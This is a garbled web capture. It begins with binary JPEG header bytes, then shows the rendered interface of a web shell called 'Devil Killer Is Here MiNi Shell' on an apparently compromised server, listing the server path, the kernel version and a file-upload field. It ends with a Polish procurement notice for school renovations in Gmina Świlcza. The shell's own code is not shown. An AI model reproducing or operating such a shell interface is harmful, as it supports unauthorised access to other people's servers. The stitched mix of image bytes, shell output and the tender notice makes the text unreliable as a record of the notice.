JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220713/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220713/0025357901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty budynków oświatowych na terenie Gminy Świlcza </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Świlcza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582140</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Świlcza</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świlcza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-072</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@swilcza.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.swilcza.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty budynków oświatowych na terenie Gminy Świlcza </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2956a6c8-02a4-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00253579</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00042421/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Remonty budynków oświatowych na terenie Gminy Świlcza</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_swilcza <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Składanie ofert (w tym<br/>pełnomocnictwa, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, inne dokumenty składające<br/>się na ofertę, o których mowa w SWZ i ustawie): Ofertę należy złożyć w sposób przewidziany w<br/>sekcjiIII.3.6. ogłoszenia. Ofertę wraz z załącznikami należy przesyłać drogą<br/>elektroniczną za ośrednictwem:https://platformazakupowa.pl/pn/gmina_swilcza (patrz: sekcja<br/>VIII.8.2ogłoszenia) 2. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy<br/>składania ofert): 1) w postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a<br/>Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień, podmiotowych<br/>środków dowodowych oraz przekazywanie informacji (innych niż wskazanych w ust. 1) odbywa się<br/>elektronicznie za pośrednictwem poczty elektronicznej (e-mail): przetargi@swilcza.com.pl; lub poprzez<br/>Platformę, dostępną pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Oferty(w tym pełnomocnictwa, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, inne dokumenty<br/>składające się na ofertę, o których mowa w SWZ i ustawie):1) Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego, musi zarejestrować (zalogować) się na Platformie<br/>i postępować zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania<br/>informatycznego pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza 2) Zamawiający<br/>informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert, wielkości przesyłanych plików, odbierania<br/>dokumentów elektronicznych, zmiana lub wycofanie oferty oraz innych czynności podejmowanych w<br/>niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców”<br/>na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje3) ofertę<br/>sporządza się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym; 4)<br/>w celu złożenia oferty należy zarejestrować (zalogować) się na Platformie i postępować zgodnie z<br/>instrukcjami dostępnymi u dostawcy rozwiązania informatycznego pod<br/>adresem:https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view5) jeżeli<br/>dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają<br/>informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia<br/>1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu<br/>utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku,<br/>wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”;6)<br/>do oferty należy dołączyć dokumenty wymagane w ustawie oraz w SWZ, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym a następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku<br/>archiwum(ZIP);7) oferta może być złożona tylko do upływu terminu składania ofert;8) Wykonawca po<br/>upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty;9)<br/>dane postępowanie można wyszukać na Liście wszystkich postępowań pod<br/>adresem:https://platformazakupowa.pl ze strony głównej z zakładki Postępowania lub pod<br/>adresem:https://platformazakupowa.pl/pn/gmina_swilcza klikając opcję Postępowania.2. Sposób<br/>komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert)1) w postępowaniu o<br/>udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności<br/>składanie oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych oraz<br/>przekazywanie informacji (innych niż wskazanych w ust. 1) odbywa się elektronicznie za<br/>pośrednictwem poczty elektronicznej (e-mail) lub poprzez Platformę, dostępną pod<br/>adresem:https://platformazakupowa.pl/pn/gmina_swilcza 2) we wszelkiej korespondencji związanej z<br/>niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP) lub<br/>numerem referencyjnym nadanym przez zamawiającego;3) adres poczty elektronicznej do<br/>komunikacji Wykonawców z Zamawiającym (e-mail): przetargi@swilcza.com.pl;4) za datę przekazania<br/>oświadczeń ,wniosków, zawiadomień, podmiotowych środków dowodowych oraz informacji (innych niż<br/>wskazanych w ust. 1) przyjmuje się datę ich przekazania na platformie -<br/>https://platformazakupowa.pl/pn/gmina_swilcza lub wpłynięcia na ww. adres poczty elektronicznej;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119<br/>z04.05.2016, str. 1, z późn. zm.), dalej „RODO”, informuję, że: - administratorem<br/>Pani/Pana danych osobowych jest Gmina Świlcza, 36-072 Świlcza 168; tel.: 17 8670100, fax: 17<br/>8670157, email: ug.swilcza@intertele,pl; inspektorem ochrony danych osobowych u<br/>zamawiającego jak wyżej jest Pan Daniel Panek, kontakt z Inspektorem Ochrony Danych –<br/>biuro@mpls.com.pl; -Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1<br/>lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „<br/>&#34;Remonty budynków oświatowych na terenie Gminy Świlcza&#34;,<br/>numer referencyjny: RGI.271.19.2022, prowadzonym w trybie podstawowym; - odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dn. 11 września 2019 r. –Prawo<br/>zamówień publicznych (Dz. U. z 2021 r. poz. 1129), dalej „ustawa Pzp”; -<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy; - obowiązek podania przez<br/>Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; - w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22RODO; - posiada Pani/Pan:– na podstawie art.<br/>15 RODO prawo dostępu dodanych osobowych Pani/Pana dotyczących*;– na podstawie art. 16 RODO<br/>prawo do sprostowania Pani/Pana danych osobowych** ;– na podstawie art. 18 RODO prawo żądania<br/>od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o<br/>których mowa w art. 18ust. 2 RODO***;– prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan,że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO; - nie przysługuje Pani/Panu:– w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo dousunięcia danych osobowych;– prawo do przenoszenia danych osobowych, o którym<br/>mowa w art. 20RODO;– na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO; - w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez<br/>zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO, zamawiający może żądać od<br/>osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia; - Zamawiający<br/>udostępnia dane osobowe, o których mowa wart. 10 RODO, w celu umożliwienia korzystania ze<br/>środków ochrony prawnej, o których mowa w dziale IX ustawy, do upływu terminu na ich<br/>wniesienie; - przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na<br/>niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem<br/>właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz: sekcja III 3.15 ogłoszenia: * Wyjaśnienie: W<br/>przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1– 3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego; ** Wyjaśnienie: Skorzystanie<br/>przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym<br/>mowa w art.16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym<br/>z ustawą. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia<br/>do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników; *** Wyjaśnienie: Prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust.1RODO, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia tego postępowania;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGI.271.19.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remonty budynków oświatowych na terenie Gminy Świlcza.<br/>3.	Przedmiot zamówienia obejmuje wykonanie następujących robót:<br/>1)	remont sal lekcyjnych oraz wymiana posadzki w świetlicy – Szkoła Podstawowa w Dąbrowie <br/>w zakresie:<br/>a)	sala świetlicowa,<br/>b)	sala 1 na górze,<br/>c)	sala 2 na górze,<br/>d)	sala 3 na górze<br/>2)	remont szatni na świetlicę szkolną – Szkoła Podstawowa nr 2 w Bratkowicach w zakresie:<br/>a)	prace budowlane,<br/>b)	elektryka;<br/>3)	remont łazienek w Przedszkolu w Bratkowicach w zakresie:<br/>a)	łazienka parter:<br/>	malowanie ścian i sufitów,<br/>	wymiana biały montaż,<br/>	drzwi z płyty do WC,<br/>	wymiana opraw oświetleniowych;<br/>b)	łazienka 1 I piętro:<br/>	malowanie ścian i sufitów,<br/>	wymiana biały montaż,<br/>	drzwi z płyty do WC,<br/>	wymiana opraw oświetleniowych;<br/>c)	łazienka 2 I piętro:<br/>	malowanie ścian i sufitów,<br/>	wymiana biały montaż,<br/>	drzwi z płyty do WC,<br/>	wymiana opraw oświetleniowych;<br/>d)	łazienka piwnica:<br/>	roboty budowlane,<br/>	wymiana biały montaż,<br/>	zabudowa GK,<br/>	drzwi z płyty do WC,<br/>	wymiana opraw oświetleniowych;<br/>4)	remont piwnic oraz wymiana posadzki w salach – Przedszkole w Świlczy w zakresie:<br/>a)	posadzki z płytek,<br/>b)	roboty malarskie,<br/>c)	sala gimnastyczna,<br/>d)	sala V,<br/>e)	sekretariat,<br/>f)	gabinet dyrektora;<br/>5)	remont pomieszczeń w Szkole Podstawowej w Mrowli w zakresie:<br/>a)	piwnice:<br/>	piwnica nr 1,<br/>	remont ścian,<br/>	piwnica nr 2,<br/>	kanalizacja sanitarna;<br/>b)	łazienka: remont łazienki – instalacja wod-kan;<br/>6)	malowanie elewacji w Szkole Podstawowej w Świlczy w zakresie:<br/>a)	kominy,<br/>b)	elewacja,<br/>c)	cokół.<br/>Szczegółowy opis i zakres przedmiotu zamówienia określa Specyfikacja Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45432100-5 - Kładzenie i wykładanie podłóg</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Określono w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie, o którym mowa w Rozdziale X ust. 1 SWZ składa każdy z Wykonawców.<br/>Oświadczenie to potwierdza brak podstaw wykluczenia.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/>4. Oświadczenie potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane jedynie w formie<br/>pisemnej w postaci aneksu do umowy podpisanego przez obydwie strony, pod rygorem<br/>nieważności.2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem art. 455p.z.p. oraz<br/>art. 3 umowy. 3. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w<br/>stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku<br/>wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, w zakresie: 1)zmiany<br/>terminu realizacji przedmiotu umowy spowodowane: a) 